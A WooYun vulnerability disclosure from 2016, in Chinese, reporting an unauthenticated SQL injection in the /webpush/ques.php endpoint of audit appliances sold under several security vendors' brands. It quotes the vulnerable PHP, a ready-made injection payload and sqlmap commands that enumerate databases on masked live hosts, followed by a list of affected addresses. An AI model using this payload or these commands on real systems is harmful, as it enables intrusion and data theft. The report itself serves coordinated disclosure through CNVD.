当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(3) 关注此漏洞

缺陷编号: WooYun-2016-173195

漏洞标题: 某安全管理(审计)系统存在SQL注入(无需登录涉及网神&网御星云等众多安全厂商)

相关厂商: cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间: 2016-01-28 10:58

公开时间: 2016-01-28 17:30

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 15

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 安全意识不足 php源码审核 安全意识不足

1人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-28: 细节已通知厂商并且等待厂商处理中
2016-02-01: 厂商已经确认,细节仅向厂商公开
2016-02-04: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2016-03-27: 细节向核心白帽子及相关领域专家公开
2016-04-06: 细节向普通白帽子公开
2016-04-16: 细节向实习白帽子公开
2016-01-28: 细节向公众公开

简要描述:

某安全管理(审计)系统存在SQL注入(无需登录涉及网神&网御星云等众多安全厂商)

详细说明:

依然影响多个大安全厂商的”安全“产品,存在漏洞的文件为:

code 区域
/webpush/ques.php



该文件的部分代码为:

code 区域
if(isset($_POST['otheradv'])){
$otheradv = urldecode($_POST['otheradv']);
}
for($i=1;$i<=$hiddpnum;$i++){
$arr_col="";
$arr_col=array();
$dpques = "";
$post_ques = array();
$dpname = urldecode($_POST["hiddpname$i"]);
$dp = $_POST["dp$i"];
if($dp!="1"){
if(isset($_POST["dpques$i"])){
$post_ques = $_POST["dpques$i"];
}
foreach ($post_ques as $key=>$value){
$arr_col[]="advise_".$key;
}
if(isset($_POST['other'.$i])&&trim($_POST['other'.$i])!=""){
$dpques.="其它:".urldecode($_POST['other'.$i]);
}
}
addQuesDate($dpname,$dp,$tel,$ip,$time,$dpques,$otheradv,$name,$arr_col,$post_ques);
}



可以看出POST参数otheradv经过的urldecode解码进入了addQuesDate函数,继续跟上

code 区域
function addQuesDate($post_name,$content,$tel_num,$ip,$time,$advise,$other,$ques_name,$col,$ques){
$sql = "insert into tb_web_push(`post_name`,`content`,`tel_num`,`ip`,`time`";
if($advise!=""){
$sql.=",`advise`";
}
$sql.=",`other`,`ques_name`";
if(!empty($col)){
foreach ($col as $key=>$value)
{
$sql.=",`".$value."`";
}
}
$sql.=") values('$post_name','$content','$tel_num','$ip','$time'";
if($advise!=""){
$sql.=",'$advise'";
}
$sql.=",'$other','$ques_name'";
if(!empty($ques)){
foreach ($ques as $key=>$value){
$sql.=",'$value'";
}
}
$sql.=")";
$result = byzoro_query_local($sql);
return $result;
}



可以看出,该参数进入了sql语句的insert语句,造成了注入

为了能使用sqlmap进行数据测试,我们提交otheradv为如下参数即可:

code 区域
otheradv=1%2527,(select post_name from tb_web_push where tel_num=1*))%23

漏洞证明:

由于该漏洞同样影响多个系统,随便选择几个系统作漏洞证明

0x1 **.**.**.**:8443/ (网神安全审计系统)

code 区域
sqlmap.py -u "**.**.**.**:8443/webpush/ques.php" --data "hiddpnum=1&hiddpname1=1&dp1=1&name=1&tel=1231&otheradv=1%2527,(select post_name from tb_web_push where tel_num=1*))%23" --dbms mysql --technique T



1.png



0x2 **.**.**.**:8443/(网御上网行为管理系统)

code 区域
sqlmap.py -u "**.**.**.**:8443/webpush/ques.php" --data "hiddpnum=1&hiddpname1=1&dp1=1&name=1&tel=1231&otheradv=1%2527,(select post_name from tb_web_push where tel_num=1*))%23" --dbms mysql --technique T



2.png



利用sqlmap获取的数据,如图

code 区域
sqlmap.py -u "**.**.**.**:8443/webpush/ques.php" --data "hiddpnum=1&hiddpname1=1&dp1=1&name=1&tel=1231&otheradv=1%2527,(select post_name from tb_web_push where tel_num=1*))%23" --dbms mysql --technique T --dbs



3.png



其他还有大量的案例,这里给出部份:

code 区域
网神
**.**.**.**:8443/
**.**.**.**:8443/
**.**.**.**:8443/
**.**.**.**:8443/
**.**.**.**:8443/
**.**.**.**:8443/
**.**.**.**:8443/
**.**.**.**:8443/
**.**.**.**:8443/

网御
**.**.**.**:8443/
https://**.**.**.**:8443/
**.**.**.**:8443/
**.**.**.**:8443/
**.**.**.**:8443/
https://**.**.**.**:8443/
**.**.**.**:8443/
**.**.**.**:8443/
**.**.**.**:8443/
**.**.**.**:8443/
**.**.**.**:8443/
**.**.**.**:8443/
**.**.**.**:8443/
**.**.**.**:8443/
**.**.**.**:8443/
https://**.**.**.**:8443/
https://**.**.**.**:8443/
**.**.**.**:8443/
**.**.**.**:8443/
**.**.**.**:8443/
**.**.**.**:8443/

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2016-02-01 18:16

厂商回复:

CNVD确认并复现所述情况,已由CNVD通过软件生产厂商公开联系渠道向其邮件通报,由其后续提供解决方案并协调相关用户单位处置。

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

登录后才能发表评论,请先 登录